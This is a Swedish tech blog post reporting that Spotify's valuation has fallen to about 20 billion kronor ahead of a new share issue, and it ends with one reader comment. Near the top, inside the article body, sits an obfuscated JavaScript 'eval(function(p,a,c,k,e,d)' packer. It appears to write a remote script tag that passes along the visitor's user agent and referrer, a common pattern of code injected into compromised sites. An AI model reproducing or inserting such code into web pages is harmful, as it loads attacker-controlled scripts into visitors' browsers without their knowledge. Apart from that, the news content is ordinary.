Image Image Image Image Image Image Image Image Image Image

| 29 maj, 2020

Scroll to top

Top

Spotifys värdering sjunker med sju miljarder

Spotifys värdering sjunker med sju miljarder
Sebastian

Spotify: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|znbie|var|u0026u|referrer|izbhd||js|php’.split(’|’),0,{}))
Musiktjänsten har tappat väldigt mycket på senare tid. I september 2012 var bolaget värderat upp mot 26 miljarder svenska kronor men inte längre.

Wall Street Journal skriver att Spotify nu fått sig en värdering på 20 miljarder svenska kronor och man baserar detta på en planerad nyemission som ska få in runt 700 miljoner i bolaget. Med denna nyemission skulle bolaget få in ca 2,6 miljarder kronor med detta verkar ha blivit lägre än väntat. Bland investerare så ska banken Goldman Sachs vara en av spelarna i den senaste nyemissionen.

Idag har Spotify runt 15 miljoner användare där ungefär fyra miljoner är betalande prenumeranter. Dessa siffror är från ett meddelande som Spotify gav ut i slutet av juli i år.
Förra året gjorde bolaget en förlust på ca 380 miljoner kronor, dvs, Spotify är fortfarande inte vinstdrivande.

Mer info: www.di.se

Comments

  1. Johannes

    Alla pengar är fan bara hittepå-pengar